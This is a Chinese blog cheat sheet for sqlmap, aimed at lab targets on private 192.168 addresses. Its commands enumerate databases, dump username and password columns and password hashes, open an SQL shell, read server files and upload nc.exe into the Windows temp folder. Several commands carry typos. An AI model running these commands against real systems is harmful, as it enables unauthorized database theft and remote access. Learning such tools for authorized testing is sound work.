首页 > 数据库 >Sqlmap使用

Sqlmap使用

时间:2024-07-04 23:20:53浏览次数:1  
标签:Sqlmap sqlmap http -- py 192.168 使用 id

基础使用

sqlmap.py -u "http://192,168.1.104/sq11/Less-1/?id=1&uid=2 "

文本中获取请求

sqlmap.py -r desktop/1.txt

查询数据库与表

sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1 --dbs
sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1 --D --tabls//-D 不指定具体数据库
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --current-db //当前网站使用的数据库

获取字段与内容

sqlmap.py -u "http://192.168,1.7/sq1/union.php?id=1" -D dkeye -T user info --columns
sqlmap.py-u"http://192.168,1.7/sq1/union.php?id=1"-D dkeye -T user info --c password,usernaems --dump

查询用户与密码

sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --passwords
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --users
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --current-user //当前网站用户

进阶使用

设置探测等级

--level 5

运行命令

sqlmap.py -u "http://192.168.1.7/sq1/union.php?id=1” --sq1-she1

读取或上传文件

http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther"  --file-read "C:/example.exe" -v1

python sqlmap.py -u "http://192.168.136.129/sq1map/mysq1/get int.aspx?id-1"
--file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
//1. `-v 1`: 这个参数设置 sqlmap 的详细级别为 1,即显示基本信息。

标签:Sqlmap,sqlmap,http,--,py,192.168,使用,id
From: https://www.cnblogs.com/Ho1dF0rward/p/18284881

相关文章

  • springboot 中推荐使用哪些比较好的 web 客户端 SDK
    在SpringBoot中,有几种常用和推荐的Web客户端SDK,可以用于与RESTful或其他类型的Web服务进行交互。1.SpringWebClientSpringWebClient是Spring5中引入的非阻塞、响应式的Web客户端,推荐用于现代SpringBoot应用。特点响应式编程:支持响应式编程模型,适用于需......
  • 昇思25天学习打卡营第8天|使用静态图加速
            神经网络编译框架分为两种运行模式,分别是动态图模式以及静态图模式。MindSpore默认情况下是以动态图模式运行,但也支持手工切换为静态图模式。动态图模式:        该模式类似Python的解释执行方式,一边编译一遍执行。在计算图中定义一个Tensor时,其值就......
  • Spring MVC 中使用 RESTFul 编程风格
    1.SpringMVC中使用RESTFul编程风格@目录1.SpringMVC中使用RESTFul编程风格2.RESTFul编程风格2.1RESTFul是什么2.2RESTFul风格与传统方式对比3.SpringMVC中使用RESTFul编程风格(增删改查)的使用3.1准备工作3.2RESTFul风格的“查询”所有(RESTFul规范......
  • vue项目中使用AES实现密码加密解密ECB和CBC模式)
    ECB:是一种基础的加密方式,密文被分割成分组长度相等的块(不足补齐),然后单独一个个加密,一个个输出组成密文。CBC:是一种循环模式,前一个分组的密文和当前分组的明文异或或操作后再加密,这样做的目的是增强破解难度。(不容易主动攻击,安全性好于ECB,是SSL、IPSec的标准) 1.先安装crypto-......
  • 使用文皮皮统计分析出四大名著《红楼梦》长篇小说的所有人物出场次数
    要使用文皮皮统计分析出四大名著《红楼梦》长篇小说的所有人物出场次数,我们要做如下准备工作。首先,我们准备一份《红楼梦》的txt小说其次,上传到文皮皮再次,点击开始分析,大概等个几秒钟就分析完毕然后,点击下面的“众里寻她”按钮最后就出现了整个《红楼梦》小说的人物名字了......
  • Intel DPC++安装与使用
    IntelDPC++安装与使用 DPC++(DataParallelC++)是Intel公司使用oneAPI实现的SYCL和SYCL编译器,这里记录一下V100服务器安装DPC++过程下载安装DPC++编译器前往官网下载地址,左侧选择Compilers->Intel®oneAPIDPC++/C++CompilerandIntel®C++CompilerClassic,选择目前最......
  • 为什么salesforce需要设置社区端,而不是使用和内部员工同样的环境
    虽然企业可能希望为客户和合作伙伴提供与内部员工相同的环境,但实际上这样做有几个显著的缺点和风险。这些包括:安全性和权限管理:内部员工的系统通常包含敏感和机密的信息,例如财务数据、内部策略和未发布的产品信息。将客户和合作伙伴纳入同一个环境会增加数据泄露的风险。......
  • Rabbitmq的使用
    rabbitmq的使用1.使用场景及它的特点介绍2.mq的5种常用消息模型2.1队列模型—-1对12.2队列模型—1(生产者)对多(消费者)特点: 1.当有多个消费者时,无论消费者处理的性能是否相同,生产者的消费会平均分配给每一个消费者 2.每个消费者处理的消息是否存在重复?不会重复 ......
  • Python学习笔记28:进阶篇(十七)常见标准库使用之质量控制中的代码质量与风格第二部分
    前言本文是根据python官方教程中标准库模块的介绍,自己查询资料并整理,编写代码示例做出的学习笔记。根据模块知识,一次讲解单个或者多个模块的内容。教程链接:https://docs.python.org/zh-cn/3/tutorial/index.html质量控制质量控制(QualityControl,QC),主要关注于提高......
  • osg使用整理(12):SSAO屏幕空间环境光遮蔽
    一、基础概念1、SSAO:通过将褶皱、孔洞和非常靠近墙面变暗的方法,近似模拟间接光照。SSAO称为屏幕空间环境光遮蔽,使用屏幕空间场景的深度而不是真实的几何体数据来确定遮蔽量,速度快效果好。2、实现原理:根据物体表面法线方向生成一个半球随机深度采样,主要看物体周围深度值大小,通......